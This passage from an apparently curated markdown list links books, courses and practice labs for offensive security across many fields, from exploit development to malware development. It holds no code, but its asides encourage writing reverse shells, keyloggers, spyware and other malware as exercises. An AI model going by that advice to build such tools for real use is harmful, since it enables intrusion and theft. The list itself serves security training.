- <a href="https://www.sans.org/cyber-security-courses/network-penetration-testing-ethical-hacking/">SEC560</a>
- <a href="https://www.sans.org/cyber-security-courses/advanced-penetration-testing-exploits-ethical-hacking/">SEC660</a>
- <a href="https://www.sans.org/cyber-security-courses/red-team-exercises-adversary-emulation/">SEC564</a>
- <a href="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course">Practical Ethical Hacking</a>
- <a href="https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners">Windows Privilege Escalation for Beginners</a>
- <a href="https://academy.tcm-sec.com/p/linux-privilege-escalation">Linux Privilege Escalation for Beginners</a>
- <a href="https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers">Movement, Pivoting, and Persistence</a>
- <a href="https://academy.tcm-sec.com/p/external-pentest-playbook">The External Pentest Playbook</a>
- <a href="https://www.pentesteracademy.com/activedirectorylab">CRTP</a>
- <a href="https://www.pentesteracademy.com/redteamlab">CRTE</a>
- <a href="https://www.pentesteracademy.com/gcb">PACES</a>
- <a href="https://www.mile2.com/professional-ethical-hacker/">CPEH</a>
- <a href="https://www.mile2.com/penetration-testing-engineer-outline/">CPTE</a>
- Labs
- <a href="https://www.amazon.com/Building-Virtual-Pentesting-Advanced-Penetration-ebook/dp/B01JLBMC8G">Building Virtual Pentesting Labs for Advanced Penetration Testing></a>
- <a href="https://www.hackthebox.eu/hacker/pro-labs">Hack The Box: Pro Labs</a>
- <a href="https://github.com/Marshall-Hallenbeck/red_team_attack_lab">Red Team Attack Lab</a>
- <a href="https://github.com/R3dy/capsulecorp-pentest">Capsulecorp Pentest</a>
- <a href="https://rmusser.net/git/admin-2/Infosec_Reference/src/branch/master/Draft/Building_A_Lab.md">Building a Lab</a>
- <a href="https://github.com/oliverwiegers/pentest_lab">Pentest Lab</a>
- <a href="https://github.com/itboxltda/pentestlab">Local PentestLab Management Script</a>
- <a href="https://github.com/s0wr0b1ndef/pentest-lab">Pentest-lab</a>
- <a href="https://github.com/indigos33k3r/portainer-pentest-lab">Offensive Security Lab</a>
- <a href="https://attackdefense.pentesteracademy.com/search">Pentesteracademy Labs</a>
- <a href="https://www.hackthebox.eu/">Hack The Box</a>
- <a href="https://www.vulnhub.com/">Vulnhub</a>
- <a href="https://www.offensive-security.com/labs/individual/">Offensive Security Proving Grounds</a>
- <a href="https://tryhackme.com">TryHackMe</a>
<br>
<br>
# Wireless
- Books
- <a href="https://www.amazon.com/BackTrack-Wireless-Penetration-Testing-Beginners/dp/1849515581">BackTrack 5 Wireless Penetration Testing Beginner's Guide</a>
- <a href="https://www.amazon.com/Linux-Wireless-Penetration-Testing-Cookbook/dp/1783554088">Kali Linux Wireless Penetration Testing Cookbook</a>
- <a href="https://www.amazon.com/Mastering-Wireless-Penetration-Testing-Environments/dp/9352130839">Mastering Wireless Penetration Testing for Highly Secured Environments</a>
- Courses
- <a href="https://www.offensive-security.com/wifu-oswp/">OSWP</a>
- <a href="https://www.pentesteracademy.com/course?id=9">Wi-Fi Security and Pentesting</a>
- <a href="https://www.udemy.com/course/wi-fi-password-penetration-testing-course/">Wi-Fi Hacking and Wireless Penetration Testing Course </a>
- <a href="https://www.sans.org/cyber-security-courses/wireless-penetration-testing-ethical-hacking/">SEC617: Wireless Penetration Testing and Ethical Hacking</a>
- Labs
- <a href="https://www.amazon.com/Building-Pentesting-Lab-Wireless-Networks/dp/1785283154">Building a Pentesting Lab for Wireless Networks</a>
- The Courses and Books have explained how to build a lab
<br>
<br>
# IoT & Hardware
- Books
- <a href="https://www.amazon.com/Practical-IoT-Hacking-Fotios-Chantzis-ebook/dp/B085BVVSN6">Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things</a>
- <a href="https://www.amazon.com/IoT-Hackers-Handbook-Practical-Internet/dp/1484242998">The IoT Hacker's Handbook: A Practical Guide to Hacking the Internet of Things</a>
- <a href="https://www.amazon.com/IoT-Penetration-Testing-Cookbook-vulnerabilities/dp/1787280578">IoT Penetration Testing Cookbook: Identify Vulnerabilities and Secure Your Smart Devices</a>
- <a href="https://nostarch.com/hardwarehacking">The Hardware Hacking Handbook: Breaking Embedded Security with Hardware Attacks</a>
- <a href="https://www.amazon.com/Practical-Hardware-Pentesting-attacking-protecting/dp/1789619130">Practical Hardware Pentesting: A Guide to Attacking Embedded Systems and Protecting Them Against the Most Common Hardware Attacks</a>
- Courses
- <a href="https://www.sans.org/cyber-security-courses/iot-penetration-testing/">SEC556: IoT Penetration Testing</a>
- <a href="https://www.attify.com/iot-security-exploitation-training">Offensive IoT Exploitation</a>
- <a href="https://www.udemy.com/course/securing-iot-from-security-to-practical-pentesting-on-iot/">Securing IoT: From Security to Practical Pentesting on IoT </a>
- <a href="https://securinghardware.com/training/courses/">Applied Physical Attacks Series</a>
- Labs
- The Courses and Books have explained how to build a lab
<br>
<br>
# ICS and SCADA
- Books
- <a href="https://www.amazon.com/Hacking-Exposed-Industrial-Control-Systems/dp/1259589714">Hacking Exposed Industrial Control Systems: ICS and SCADA Security Secrets & Solutions</a>
- <a href="https://www.amazon.com/Hacking-SCADA-Industrial-Control-Systems/dp/1533022062">Hacking SCADA/Industrial Control Systems: The Pentest Guide</a>
- <a href="https://www.amazon.com/Handbook-SCADA-Control-Systems-Security/dp/1498717071">Handbook of SCADA/Control Systems Security</a>
- <a href=""></a>
- Courses
- <a href="https://www.eccouncil.org/programs/ics-scada-cybersecurity/">ICS/SCADA Cybersecurity (Ec council)</a>
- <a href="https://www.sans.org/cyber-security-courses/ics-scada-cyber-security-essentials/">ICS410: ICS/SCADA Security Essentials</a>
- Labs
- The Courses and Books have explained how to build a lab
<br>
<br>
# Exploit Development
- Books
- <a href="https://www.amazon.com/Penetration-Testing-Shellcode-network-level-vulnerabilities-ebook/dp/B076H9DD9N">Penetration Testing with Shellcode</a>
- <a href="https://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security-ebook/dp/B004P5O38Q/">The Shellcoder's Handbook</a>
- <a href="https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson-ebook/dp/B004OEJN3I/">Hacking: The Art of Exploitation</a>
- <a href="https://www.amazon.com/Attacking-Network-Protocols-Analysis-Exploitation/dp/1593277504/">Attacking Network Protocols: A Hacker's Guide to Capture, Analysis, and Exploitation</a>
- <a href="https://www.amazon.com/Bug-Hunters-Diary-Software-Security/dp/1593273851/">A Bug Hunter's Diary</a>
- <a href="https://www.amazon.com/Buffer-Overflow-Attacks-Exploit-Prevent-ebook/dp/B002C1B7SE/">Buffer Overflow Attacks: Detect, Exploit, Prevent</a>
- <a href="https://www.amazon.com/Linux-Exploit-Development-Beginners-Step-ebook/dp/B082DMZHK2">Linux Exploit Development for Beginners</a>
- <a href="https://www.amazon.com/Fuzzing-Brute-Force-Vulnerability-Discovery/dp/0321446119/">Fuzzing: Brute Force Vulnerability Discovery</a>
- <a href="https://www.amazon.com/Fuzzing-Software-Security-Testing-Assurance/dp/1608078507/">Fuzzing for Software Security Testing and Quality Assurance</a>
- <a href="https://www.fuzzingbook.org/">The Fuzzing Book</a>
- <a href="https://www.amazon.com/Open-Source-Fuzzing-Tools-Rathaus-ebook/dp/B0050UZ258/">Open Source Fuzzing Tools</a>
- <a href="https://www.amazon.com/Guide-Kernel-Exploitation-Attacking-Core/dp/1597494860">A Guide to Kernel Exploitation</a>
- Courses
- <a href="https://www.offensive-security.com/ctp-osce/">OSCE</a>
- <a href="https://www.offensive-security.com/awe-osee/">OSEE</a>
- <a href="https://my.ine.com/path/019938d9-11cf-459b-b8ee-e662e10515f2">eCXD</a>
- <a href="https://www.sans.org/cyber-security-courses/advanced-exploit-development-penetration-testers/">SEC760</a>
- <a href="https://github.com/cranelab/exploit-development">Exploit-Development Repo</a>
- <a href="https://guyinatuxedo.github.io/">Nightmare</a>
- <a href="https://www.pentesteracademy.com/course?id=3">x86 Assembly Language and Shellcoding on Linux</a>
- <a href="https://samsclass.info/127/127_S21.shtml">CNIT 127: Exploit Development</a>
- <a href="https://www.pentesteracademy.com/course?id=7">x86_64 Assembly Language and Shellcoding on Linux</a>
- <a href="https://www.pentesteracademy.com/course?id=41">Reverse Engineering Win32 Applications</a>
- <a href="https://www.pentesteracademy.com/course?id=40">Reverse Engineering Linux 32-bit Applications</a>
- <a href="https://www.pentesteracademy.com/course?id=13">Exploiting Simple Buffer Overflows on Win32</a>
- <a href="https://www.udemy.com/course/reverse-engineering-and-exploit-development/">Reverse Engineering and Exploit Development </a>
- <a href="https://www.udemy.com/course/exploit-development/">Exploit Development for Linux (x86)</a>
- <a href="https://www.udemy.com/course/64bit-linux-exploit-development/">Exploit Development for Linux x64</a>
- <a href="https://www.udemy.com/course/introduction-to-exploitzero-day-discovery-and-development/">Introduction to Exploit/Zero-Day Discovery and Development</a>
- <a href="https://www.udemy.com/course/exploit-development-from-scratch/">Exploit Development From Scratch</a>
- <a href="https://www.udemy.com/course/hands-on-exploit-development/">Hands-on Fuzzing and Exploit Development(Part 1)</a>
- <a href="https://www.udemy.com/course/hands-on-exploit-development-advanced/">Hands-on Fuzzing and Exploit Development(Part 2)</a>
- <a href="https://zdresearch.com/training/exploit-development/">ZDResearch Exploit Development</a>
- Labs
- Analyize previous and new zero-days vulnerabilities will dive you deep into the real-world
- <a href="https://cse466.pwn.college/">PWN collage</a>
- <a href="https://pwnable.kr/play.php">Pwnable</a>
- <a href="https://github.com/stephenbradshaw/vulnserver">Vulnserver</a>
- <a href="">BlazeDVD 5 Professional</a>
- <a href="">DVDx Player</a>
- <a href="">Easy CD DVD</a>
- <a href="">Easy Chat Server 3.1</a>
- <a href="">Easy File Sharing FTP Server 3.5</a>
- <a href="">Easy File Management Web Server 5.3</a>
- <a href="">Easy File Sharing Web Server 7.2</a>
- <a href="">Easy RM to MP3 Converter 2.7.3.7</a>
- <a href="">Eureka</a>
- <a href="">FreeFTP 1.0.8 </a>
- <a href="">FreeFloat</a>
- <a href="">KarjaSoft Sami FTP Server 2.0.1</a>
- <a href="">KnFTP Server 1.0.0</a>
- <a href="">Kolibri v2.0 HTTP Server</a>
- <a href="">Millenium MP3 Studio</a>
- <a href="">Minialic HTTP</a>
- <a href="">Minishare</a>
- <a href="">ProSysInfo TFTP Server TFTPDWIN 0.4.2</a>
- <a href="">QuickZip 4.60</a>
- <a href="">R v3.4.4</a>
- <a href="">Ricoh DC Software DL-10 FTP Server</a>
- <a href="">SolarFTP</a>
- <a href="">Soritong MP3 Player 1.0 </a>
- <a href="">Xitami Webserver 2.5</a>
- <a href="https://www.vulnhub.com/">Vulnhub</a>
- <a href="https://www.hackthebox.eu/">Hack the box</a>
<br>
<br>
# Web Applications
- Books
- <a href="https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/">Web Application Hacker's Handbook</a>
- <a href="https://portswigger.net/web-security/all-materials">Portswigger learning materials</a>
- <a href="https://owasp.org/www-project-web-security-testing-guide/v42/">Owasp web Testing Guide</a>
- <a href="https://www.amazon.com/Real-World-Bug-Hunting-Field-Hacking/dp/1593278616">Real World Bug Hunting</a>
- <a href="https://payhip.com/ghostlulz">Bug Bounty playbook part 1 & 2</a>
- <a href="https://www.amazon.com/Mastering-Modern-Web-Penetration-Testing/dp/1785284584">Mastering Modern Web Penetration Testing</a>
- <a href="https://www.amazon.com/Mastering-Kali-Linux-Penetration-Testing-ebook/dp/B0721264KJ">Mastering Kali Linux for Web Penetration Testing</a>
- <a href="https://www.amazon.com/gp/product/B078MRV57M">Kali Linux Web Penetration Testing Cookbook</a>
- <a href="https://www.amazon.com/Bug-Bounty-Bootcamp-Reporting-Vulnerabilities-ebook/dp/B08YK368Y3">Bug Bounty Bootcamp</a>
- Courses
- <a href="https://www.offensive-security.com/awae-oswe/">OSWE</a>
- <a href="https://my.ine.com/CyberSecurity/learning-paths/50d07b7c-1224-4bda-a57b-3954e189bfc1/web-application-penetration-tester-professional">eWAPT</a>
- <a href="https://my.ine.com/CyberSecurity/learning-paths/7d3a5df8-a6cf-4855-b686-30e9d7e76425/advanced-web-application-penetration-testing">eWAPTX</a>
- <a href="https://www.sans.org/cyber-security-courses/web-app-penetration-testing-ethical-hacking/">SEC542</a>
- <a href="https://www.sans.org/cyber-security-courses/advanced-web-app-penetration-testing-ethical-hacking/">SEC642</a>
- <a href="https://hackersera.com/p/?page=online-training">Offensive bug bounty hunter part 1 &2 hackersera</a>
- <a href="https://hakin9.org/product/web-application-attacks-and-api-hacking-w51/">Web Application Attacks and API Hacking (W51)</a>
- Labs
- <a href="http://sourceforge.net/projects/bwapp/files/bee-box/">bWAPP</a>
- <a href="https://github.com/jbarone/penlab">penlab</a>
- <a href="https://portswigger.net/web-security/all-labs">Portswigger labs</a>
- <a href="https://hack.me/">Hack me</a>
- <a href="https://owasp.org/www-project-juice-shop/">OWASP Juice shop</a>
- <a href="https://owasp.org/www-project-broken-web-applications/migrated_content">Owasp Broken Web Apps </a>
- <a href="https://pentesterlab.com/">Pentesterlab</a>
- <a href="https://www.root-me.org/">root-me</a>
<br>
<br>
# Mobile Applications
- Books
- <a href="https://owasp.org/www-project-mobile-security-testing-guide/">OWASP Mobile Security Testing Guide</a>
- <a href="https://www.amazon.com/Mobile-Application-Penetration-Testing-Vijay-ebook/dp/B019IOX4Y2/">Mobile application penetration testing</a>
- <a href="https://www.amazon.com/Mobile-Application-Hackers-Handbook/dp/1118958500/">Mobile applicatons hacker's handbook</a>
- <a href="https://www.amazon.com/Android-Hackers-Handbook-Joshua-Drake/dp/111860864X/">Android hacker's handbook/</a>
- <a href="https://www.amazon.com/iOS-Hackers-Handbook-Charlie-Miller/dp/1118204123/">iOS Hacker's Handbook</a>
- Courses
- <a href="https://my.ine.com/CyberSecurity/learning-paths/eec5479e-a8d1-4803-817f-c016bb528639/mobile-application-penetration-testing-professional">eMAPT</a>
- <a href="https://www.sans.org/cyber-security-courses/mobile-device-security-ethical-hacking/">SEC575</a>
- <a href="https://hackersera.com/p/?page=online-training">Offensive AndroHunter</a>
- <a href="https://www.udemy.com/course/bug-bounty-hunting-practical-android-penetration-testing/">ANDROID Hacking & Penetration Testing</a>
- <a href="https://www.udemy.com/course/hacking-and-pentesting-ios-applications/">Hacking and Pentesting iOS Applications </a>
- Labs
- <a href="http://damnvulnerableiosapp.com/">Damn Vulnerable iOS Application (DVIA)</a>
- <a href="https://pentester.land/cheatsheets/2018/10/12/list-of-Intentionally-vulnerable-android-apps.html">List of intentionally vulnerable Android apps</a>
- <a href="https://securitycompass.github.io/iPhoneLabs/">ExploitMe Mobile iPhone Labs </a>
- <a href="https://securitycompass.github.io/AndroidLabs/">ExploitMe Mobile Android Labs </a>
<br>
<br>
# API
- Books
- <a href="https://owasp.org/www-project-api-security/">OWASP API Security Project</a>
- <a href="https://www.amazon.com/Hacking-APIs-Application-Programming-Interfaces/dp/1718502443">Hacking APIs</a>
- <a href="https://www.manning.com/books/api-security-in-action">Api Secuirty in Action</a>
- <a href="https://www.manning.com/books/understanding-api-security">Understanding Api Security</a>
- Courses
- <a href="https://hackerassociate.com/training-and-certification/oaes-offensive-api-exploitation-and-security-training/">OAES Offensive API Exploitation and Security</a>
- <a href="https://www.pluralsight.com/courses/owasp-top-ten-api-security-playbook">OWASP Top 10: API Security Playbook</a>
- <a href="https://ar-ar.facebook.com/officialhackersera/posts/1387454408290281?__tn__=-R">Offensive Api penetration testing</a>
- <a href="https://hakin9.org/product/web-application-attacks-and-api-hacking-w51/">Web Application Attacks and API Hacking (W51)</a>
- <a href="https://hakin9.org/course/api-security-offence-and-defence/">API Security: Offence and Defence (W35)</a>
- Labs
- <a href="https://github.com/payatu/Tiredful-API">Tiredful API</a>
- <a href="https://github.com/rahulunair/vulnerable-api">vulnerable-api</a>
- <a href="https://github.com/marmicode/websheep">websheep</a>
<br>
<br>
# Cloud
- Books
- <a href="https://www.amazon.com/AWS-Penetration-Testing-Beginners-Metasploit/dp/1839216921/">AWS Penetration Testing </a>
- <a href="https://www.amazon.com/Hands-Penetration-Testing-Kali-Linux/dp/1789136725/">Hands-On AWS Penetration Testing with Kali Linux</a>
- <a href="https://www.amazon.com/Pentesting-Azure-Applications-Definitive-Deployments/dp/1593278632/">Pentesting Azure Applications</a>
- <a href="https://www.amazon.com/Mastering-Cloud-Penetration-Testing-Sehgal/dp/1786461234/">Mastering Cloud Penetration Testing</a>
- Courses
- <a href="https://www.sans.org/cyber-security-courses/cloud-penetration-testing/">SEC588</a>
- Labs
- <a href="https://github.com/juanjoSanz/aws-pentesting-lab">AWS Pen-Testing Laboratory</a>
- Create Your own lab from the books
<br>
<br>
# Reverse Engineering
- Books
- <a href="https://www.amazon.com/Reversing-Secrets-Engineering-Eldad-Eilam/dp/0764574817">Reversing: Secrets of Reverse Engineering</a>
- <a href="https://www.amazon.com/Mastering-Reverse-Engineering-Re-engineer-ethical-ebook/dp/B07BXTBP8W/">Mastering Reverse Engineering</a>
- <a href="https://beginners.re/">Reverse Engineering for Beginners</a>
- <a href="">The Ghidra Book: The Definitive Guide</a>
- <a href="https://www.amazon.com/IDA-Pro-Book-Unofficial-Disassembler/dp/1593272898">The IDA Pro Book, 2nd Edition</a>
- <a href="https://www.amazon.com/Practical-Reverse-Engineering-Reversing-Obfuscation/dp/1118787315">Practical Reverse Engineering</a>
- Courses
- <a href="https://my.ine.com/CyberSecurity/learning-paths/67c2d9f8-f4f5-4705-b5e2-56d6c3583030/reverse-engineering-professional">eCRE</a>
- <a href="https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/">FOR610: Reverse-Engineering Malware</a>
- <a href="https://www.udemy.com/course/reverse-engineering-deep-dive/">Reverse Engineering Deep Dive</a>
- <a href="https://www.udemy.com/course/reverse-engineering-ida/">Reverse Engineering: IDA For Beginners</a>
- <a href="https://www.udemy.com/course/expert-malware-analysis-and-reverse-engineering/">Expert Malware Analysis and Reverse Engineering</a>
- <a href="https://www.udemy.com/course/x64dbg-debugger/">Reverse Engineering 1: x64dbg Debugger for Beginners </a>
- <a href="https://www.udemy.com/course/reverse-engineering-ghidra/">Reverse Engineering: Ghidra For Beginners </a>
- <a href="https://www.udemy.com/course/reverse-engineering-dnspy/">Reverse Engineering 6: Reversing .NET with dnSpy </a>
- <a href="https://www.youtube.com/watch?v=BRZq5EVQqhg&list=PLMB3ddm5Yvh3gf_iev78YP5EPzkA3nPdL">Reverse Engineering For Beginners (Youtube)</a>
- Labs
- <a href="https://ctf101.org/reverse-engineering/overview/">CTF101: Reverse Engineering</a>
- <a href="https://cybertalents.com/competitions/reverse-engineering-ctf/challenges">CyberTalents: Reverse Engineering CTF</a>
- <a href="https://fareedfauzi.gitbook.io/practice-ctf-list/reverse-engineering">Reverse Engineering CTF List</a>
<br>
<br>
# Social Engineering
- Books
- <a href="https://www.amazon.com/Social-Engineering-Science-Human-Hacking/dp/111943338X/">Social Engineering: The Science of Human Hacking</a>
- <a href="https://www.amazon.com/Social-Engineering-Art-Human-Hacking/dp/B08B6ZCT57/">Social Engineering: The Art of Human Hacking</a>
- <a href="https://www.amazon.com/Social-Engineers-Playbook-Practical-Pretexting/dp/0692306617/">The Social Engineer's Playbook</a>
- <a href="https://www.amazon.com/Social-Engineering-Hacking-Systems-Societies-ebook/dp/B07XHP7MQ5/">Social Engineering: Hacking Systems, Nations, and Societies</a>
- <a href="https://www.amazon.com/Learn-Social-Engineering-internationally-renowned-ebook/dp/B079HYPC27/">Learn Social Engineering</a>
- Courses
- <a href="https://www.udemy.com/course/learn-social-engineering-from-scratch/">Learn Social Engineering From Scratch</a>
- <a href="https://www.udemy.com/course/learn-malware-social-engineering-and-osint-for-hacking/">The Complete Social Engineering: Phishing & Malware</a>
- <a href="https://www.social-engineer.com/training-courses/advanced-practical-social-engineering-training/">Advanced Social Engineering Training</a>
- <a href="https://www.cybrary.it/course/social-engineering/">Social Engineering (Cybrary)</a>
- Labs
- Bro, it's about human hacking. Just hack yourself xD
<br>
<br>
# Offensive Programming
- Books
- <a href="https://www.amazon.com/Hands-Penetration-Testing-Python-intelligent/dp/178899082X">Hands-On Penetration Testing with Python</a>
- <a href="https://www.amazon.com/Python-Penetration-Testing-Cookbook-post-exploitation/dp/1784399779">Python Penetration Testing Cookbook</a>
- <a href="https://www.amazon.com/Python-Offensive-PenTest-practical-penetration/dp/1788838971">Python for Offensive PenTest</a>
- <a href="https://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900">Black Hat Python</a>
- <a href="https://www.amazon.com/Gray-Hat-Creating-Automating-Security/dp/1593277598">Gray Hat C#: A Hacker's Guide to Creating and Automating Security Tools</a>
- <a href="https://www.amazon.com/Black-Hat-Go-Programming-Pentesters/dp/1593278659">Black Hat Go: Go Programming For Hackers and Pentesters </a>
- <a href="https://www.amazon.com/Security-Go-Explore-Golang-services/dp/1788627911">Security with Go</a>
- <a href="https://www.amazon.com/Penetration-Testing-Perl-Douglas-Berdeaux/dp/1783283459">Penetration Testing with PerL</a>
- <a href="https://www.amazon.com/Black-Hat-Ruby-programming-Pentesters/dp/B08JHSF6GT">Black Hat Ruby</a>
- Courses
- I encourage you to read the books, cause there are a lot of courses for offensive programming but the most are using python.
- <a href="https://www.udemy.com/course/learn-python-and-ethical-hacking-from-scratch/">Learn Python & Ethical Hacking From Scratch</a>
- <a href="https://www.udemy.com/course/ethical-hacking-python/">The Complete Python Hacking Course: Beginner to Advanced! </a>
- <a href="https://www.infosecinstitute.com/skills/learning-paths/offensive-bash-scripting/">Offensive Bash Scripting</a>
- <a href="https://www.pentesteracademy.com/course?id=21">Powershell for Pentesters</a>
- Labs
- First of all try to create automation tools for your tasks. also you can search for offensive tools and try to write one on your own way.
- Tools:
- <a href="">Subdomain Enumeration</a>
- <a href="">Directory Bruteforcing</a>
- <a href="">Live Subdomain checker</a>
- <a href="">Google Dorking</a>
- <a href="">Extract javascript urls using page source</a>
- <a href="">Reverse & Bind Shells</a>
- <a href="">Protocol Enumeration</a>
- <a href="">Port Scanner (TCP & UDP)</a>
- <a href="">Hash & Password Cracking</a>
- <a href="">Fuzzer</a>
- <a href="">Malware ( Keylogger, Spyware, CryptoMalware, etc)</a>
- <a href="">Packet Sniffer</a>
- <a href="">Wifi Scanner or Bruteforcer</a>
- <a href="">Vulnerability Scanner ( Web, Network & System Vulnerabilities, etc )</a>
- <a href="">Exploition Tool ( Try to write an exploition tool for known vulnerability [e.x: Vsftpd backdoor exploition tool] ) </a>
- <a href="">Network Sniffer</a>
- <a href="">MAC address Changer</a>
- <a href="">Network Scanner</a>
<br>
<br>
# Blockchain
- Books
- <a href="https://www.amazon.com/Bitcoin-Blockchain-Security-Ghassan-Karame-ebook/dp/B01N7XNEF3">Bitcoin and Blockchain Security</a>
- <a href="https://www.amazon.com/Blockchain-Technology-Hacking-Financial-Framework-ebook/dp/B07221VJ1S">Blockchain Technology And Hacking</a>
- <a href="https://www.packtpub.com/product/hands-on-cybersecurity-with-blockchain/9781788990189">Hands-On Cybersecurity with Blockchain</a>
- Courses
- <a href="https://blockchaintrainingalliance.com/products/cbsp">Certified Blockchain Security Professional (CBSP)</a>
- <a href="https://www.sans.org/cyber-security-courses/blockchain-smart-contract-security/">SEC554: Blockchain and Smart Contract Security</a>
- <a href="https://academy.101blockchains.com/courses/certified-blockchain-security-expert">Blockchain Security Expert (CBSE)</a>
- <a href="https://hakin9.org/course/attack-and-defence-in-blockchain-technologies-w39/">Attack and Defence in Blockchain Technologies (W39)</a>
- <a href="https://www.dasp.co/
">Decentralized Application Security Project </a>
- Labs
- <a href="https://github.com/ConsenSys/smart-contract-best-practices">smart contract security best practices</a>
- <a href="https://github.com/nccgroup/GOATCasino">GOATCasino</a>
- <a href="https://ethernaut.openzeppelin.com/level/0x4E73b858fD5D7A5fc1c3455061dE52a53F35d966">Ethernaut</a>
<br>
<br>
# Car Hacking
- Books
- <a href="https://www.amazon.com/Car-Hackers-Handbook-Penetration-Tester/dp/1593277032">The Car Hacker's Handbook</a>
- <a href="https://www.amazon.com/Hacking-Connected-Cars-Techniques-Procedures/dp/1119491800">Hacking Connected Cars</a>
- Courses
- <a href="https://www.udemy.com/course/carhacking/">CAR HACKING 101</a>
- <a href="https://www.udemy.com/course/automotive-hacking-for-beginners/">Automotive hacking for Beginners</a>
- <a href="https://cyberweek.ae/2021/courses/car-hacking-training-automotive-cybersecurity-and-in-vehicle-networks-for-beginners-hitb-cyberweek-2021/">Car Hacking Training: Automotive Cybersecurity and In-Vehicle Networks for Beginners</a>
- <a href="https://quarkslab.com/training-practical-car-hacking/">Practical car hacking</a>
- Labs
- Setup your lab from the courses & books
<br>
<br>
# Game Hacking
- Books
- <a href="https://www.amazon.com/Exploiting-Online-Games-Massively-Distributed/dp/0132271915">Exploiting Online Games</a>
- <a href="https://www.amazon.com/Game-Hacking-Developing-Autonomous-Online/dp/1593276699">Game Hacking: Developing Autonomous Bots for Online Games</a>
- <a href="https://www.amazon.com/Hacking-Video-Game-Consoles-ExtremeTech/dp/0764578065">Hacking Video Game Consoles</a>
- <a href="https://www.amazon.com/Game-Console-Hacking-PlayStation-Nintendo/dp/1931836310">Game Console Hacking: Xbox, PlayStation, Nintendo, Game Boy, Atari and Sega</a>
- <a href="https://www.amazon.com/Hacking-Xbox-Introduction-Reverse-Engineering/dp/1593270291">Hacking the Xbox: An Introduction to Reverse Engineering</a>
- Courses
- <a href="https://www.youtube.com/playlist?list=PLt9cUwGw6CYG1b4L76vZ49tvI2mfmRSCl">CS420 Game Hacking Course</a>
- <a href="https://www.udemy.com/course/playhack/">Learn How To Code a Hack For ANY Game! - Game Hacking </a>
- <a href="https://www.udemy.com/course/cheat-engine-game-hacking-basics/">Game Hacking: Cheat Engine Game Hacking Basics</a>
- <a href="https://www.youtube.com/playlist?list=PLt9cUwGw6CYFSoQHsf9b12kHWLdgYRhmQ">Game Hacking Shenanigans - Game Hacking Tutorial Series</a>
- <a href="https://www.youtube.com/playlist?list=PL0DAC43CDE5EF7694">Game Hacking Tutorial</a>
- Labs
- Setup your lab from the courses & books
<br>
<br>
# Source Code Review
- Books
- <a href="https://www.amazon.com/SECURE-COMPUTER-SOFTWARE-DEVELOPMENT-VULNERABILITY-ebook/dp/B01NAGF70E">SECURE COMPUTER SOFTWARE DEVELOPMENT: INTRODUCTION TO VULNERABILITY DETECTION TOOLS</a>
- <a href="https://www.amazon.com/Software-Vulnerability-Programming-Herbert-Thompson/dp/1584503580">Software Vulnerability Guide</a>
- <a href="https://www.amazon.de/-/en/Brian-Chess/dp/0321424778">ecure Programming with Static Analysis: Getting Software Security Right with Static Analysis</a>
- <a href="https://owasp.org/www-pdf-archive/OWASP_Code_Review_Guide_v2.pdf">OWASP Code Review Guide v2</a>
- <a href="https://www.codacy.com/ebooks/guide-to-code-reviews-I">The ultimate guide to code reviews - Edition I</a>
- Courses (Tutorials)
- <a href="https://www.youtube.com/playlist?list=PLOeXMuu5HOMoYdidoH6UlghfrVVkzZ_cf">SAST</a>
- <a href="https://www.youtube.com/watch?v=fb-t3WWHsMQ">How to do Code Review - The Offensive Security Way</a>
- <a href="https://www.youtube.com/watch?v=eQ1I0wzS8p0">How to find vulnerabilities by source code review</a>
- <a href="https://www.youtube.com/watch?v=kpf3UkMc5Y4">Finding Security Vulnerabilities through Code Review - The OWASP way</a>
- <a href="https://www.youtube.com/watch?v=rAwxFw25x3E">OWASP DevSlop Show: Security Code Review 101 with Paul Ionescu!</a>
- <a href="https://www.youtube.com/watch?v=A8CNysN-lOM">How to Analyze Code for Vulnerabilities</a>
- Labs
- <a href="https://pentesterlab.com/exercises?utf8=%E2%9C%93&query=code+review">Pentesterlab Code Review</a>
- <a href="https://github.com/h4x0r101/Damn-Vulnerable-Source-Code">Damn Vulnerable Source Code</a>
- <a href="https://github.com/uleroboticsgroup/SVCP4CDataset
">SVCP4CDataset</a>
<br>
<br>
# Telecom
- Books
- <a href="https://www.amazon.com/Security-Telecommunications-Networks-Advances-Information-ebook/dp/B002C73P2E
">Security for Telecommunications Networks</a>
- Courses
- <a href="https://www.youtube.com/watch?v=3XUo7UBn28o">Mobile Network Hacking, IP Edition</a>
- <a href="https://www.youtube.com/watch?v=_f1SByh6f4Q">New Era in Telecom Hacking by Ali Abdollahi at BSides Toronto 2020</a>
- Labs
- Setup your lab from the courses & books
<br>
<br>
# Malware Development
- Books
- You can read malware analysis books to get a deep understanding of malwares
- Courses
- <a href="https://institute.sektor7.net/red-team-operator-malware-development-essentials">RED TEAM Operator: Malware Development Essentials Course</a>
- <a href="https://institute.sektor7.net/rto-maldev-intermediate">RED TEAM Operator: Malware Development Intermediate Course</a>
- <a href="https://www.udemy.com/course/build-undetectable-malware-using-c-language-ethical-hacking/">Build Undetectable Malware Using C Language: Ethical Hacking</a>
- <a href="https://www.udemy.com/course/malware-development-beginner-level/">Practical Malware Development For Beginners</a>
- <a href="https://www.udemy.com/course/coding-botnet-backdoor-in-python-for-ethical-hacking/">Coding Botnet & Backdoor In Python For Ethical Hacking</a>
- <a href="https://www.udemy.com/course/ehf-maldev-in-windows/">Ethical Hacking Foundations: Malware Development in Windows</a>
- Labs
- No need for online labs you need to write a malicious code
<br>
<br>
# VOIP
- Books
- <a href="https://www.amazon.com/Hacking-VoIP-Protocols-Attacks-Countermeasures/dp/1593271638">Hacking VoIP: Protocols, Attacks, and Countermeasures</a>
- <a href="https://www.amazon.com/Hacking-Exposed-VoIP-Security-Solutions/dp/0072263644">Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions</a>
- <a href="https://www.amazon.com/Hacking-Exposed-Communications-Security-Solutions/dp/0071798765">Hacking Exposed Unified Communications & VoIP Security Secrets & Solutions, Second Edition</a>
- Courses
